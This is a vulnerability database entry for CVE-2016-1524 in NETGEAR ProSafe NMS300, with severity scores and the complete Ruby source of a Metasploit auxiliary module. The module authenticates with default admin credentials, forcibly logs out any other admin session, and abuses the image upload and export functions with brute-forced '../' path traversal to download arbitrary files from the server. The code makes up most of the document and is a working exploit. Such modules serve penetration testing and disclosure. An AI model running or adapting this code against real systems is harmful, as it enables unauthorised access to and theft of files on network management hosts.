NETGEAR ProSafe Network Management System 300 Authenticated File Download

2016-02-0323:57:48

Pedro Ribeiro <[email protected]>

www.rapid7.com

CVSS2

8.3

Attack Vector

ADJACENT_NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:A/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.6

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

EPSS

0.941

Percentile

99.2%

JSON

Netgear’s ProSafe NMS300 is a network management utility that runs on Windows systems. The application has a file download vulnerability that can be exploited by an authenticated remote attacker to download any file in the system. This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'NETGEAR ProSafe Network Management System 300 Authenticated File Download',
        'Description' => %q{
          Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
          The application has a file download vulnerability that can be exploited by an
          authenticated remote attacker to download any file in the system.
          This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13.
        },
        'Author' => [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2016-1524'],
          ['US-CERT-VU', '777024'],
          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'],
          ['URL', 'https://seclists.org/fulldisclosure/2016/Feb/30']
        ],
        'DisclosureDate' => '2016-02-04'
      )
    )

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [true, 'Application path', '/']),
        OptString.new('USERNAME', [true, 'The username to login as', 'admin']),
        OptString.new('PASSWORD', [true, 'Password for the specified username', 'admin']),
        OptString.new('FILEPATH', [false, 'Path of the file to download minus the drive letter', '/Windows/System32/calc.exe']),
      ]
    )

    register_advanced_options(
      [
        OptInt.new('DEPTH', [false, 'Max depth to traverse', 15])
      ]
    )
  end

  def authenticate
    res = send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], 'userSession.do'),
      'method' => 'POST',
      'vars_post' => {
        'userName' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      },
      'vars_get' => { 'method' => 'login' }
    })

    if res && res.code == 200
      cookie = res.get_cookies
      if res.body.to_s =~ /"loginOther":true/ && res.body.to_s =~ /"singleId":"([A-Z0-9]*)"/
        # another admin is logged in, let's kick him out
        res = send_request_cgi({
          'uri' => normalize_uri(datastore['TARGETURI'], 'userSession.do'),
          'method' => 'POST',
          'cookie' => cookie,
          'vars_post' => { 'singleId' => ::Regexp.last_match(1) },
          'vars_get' => { 'method' => 'loginAgain' }
        })
        if res && res.code == 200 && (res.body.to_s !~ /"success":true/)
          return nil
        end
      end
      return cookie
    end
    return nil
  end

  def download_file(download_path, cookie)
    filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.img'
    begin
      res = send_request_cgi({
        'method' => 'POST',
        'cookie' => cookie,
        'uri' => normalize_uri(datastore['TARGETURI'], 'data', 'config', 'image.do'),
        'vars_get' => {
          'method' => 'add'
        },
        'vars_post' => {
          'realName' => download_path,
          'md5' => '',
          'fileName' => filename,
          'version' => Rex::Text.rand_text_alphanumeric(rand(8..9)),
          'vendor' => Rex::Text.rand_text_alphanumeric(rand(4..6)),
          'deviceType' => rand(999),
          'deviceModel' => Rex::Text.rand_text_alphanumeric(rand(5..7)),
          'description' => Rex::Text.rand_text_alphanumeric(rand(8..17))
        }
      })

      if res && res.code == 200 && res.body.to_s =~ /"success":true/
        res = send_request_cgi({
          'method' => 'POST',
          'cookie' => cookie,
          'uri' => normalize_uri(datastore['TARGETURI'], 'data', 'getPage.do'),
          'vars_get' => {
            'method' => 'getPageList',
            'type' => 'configImgManager'
          },
          'vars_post' => {
            'everyPage' => rand(500..1498)
          }
        })

        if res && res.code == 200 && res.body.to_s =~ /"imageId":"([0-9]*)","fileName":"#{filename}"/
          image_id = ::Regexp.last_match(1)
          return send_request_cgi({
            'uri' => normalize_uri(datastore['TARGETURI'], 'data', 'config', 'image.do'),
            'method' => 'GET',
            'cookie' => cookie,
            'vars_get' => {
              'method' => 'export',
              'imageId' => image_id
            }
          })
        end
      end
      return nil
    rescue Rex::ConnectionRefused
      print_error("#{peer} - Could not connect.")
      return
    end
  end

  def save_file(filedata)
    vprint_line(filedata.to_s)
    fname = File.basename(datastore['FILEPATH'])

    path = store_loot(
      'netgear.http',
      'application/octet-stream',
      datastore['RHOST'],
      filedata,
      fname
    )
    print_good("File saved in: #{path}")
  end

  def run
    cookie = authenticate
    if cookie.nil?
      fail_with(Failure::Unknown, "#{peer} - Failed to log in with the provided credentials.")
    else
      print_good("#{peer} - Logged in with #{datastore['USERNAME']}:#{datastore['PASSWORD']} successfully.")
      store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'], proof: cookie) # more consistent service_name and protocol
    end

    if datastore['FILEPATH'].blank?
      fail_with(Failure::Unknown, "#{peer} - Please supply the path of the file you want to download.")
      return
    end

    filepath = datastore['FILEPATH']
    res = download_file(filepath, cookie)
    if res && res.code == 200 && (res.body.to_s.bytesize != 0 && (res.body.to_s !~ /This file does not exist./) && (res.body.to_s !~ /operation is failed/))
      save_file(res.body)
      return
    end

    print_error("#{peer} - File not found, using bruteforce to attempt to download the file")
    count = 1
    while count < datastore['DEPTH']
      res = download_file(('../' * count).chomp('/') + filepath, cookie)
      if res && res.code == 200 && (res.body.to_s.bytesize != 0 && (res.body.to_s !~ /This file does not exist./) && (res.body.to_s !~ /operation is failed/))
        save_file(res.body)
        return
      end
      count += 1
    end

    print_error("#{peer} - Failed to download file.")
  end
end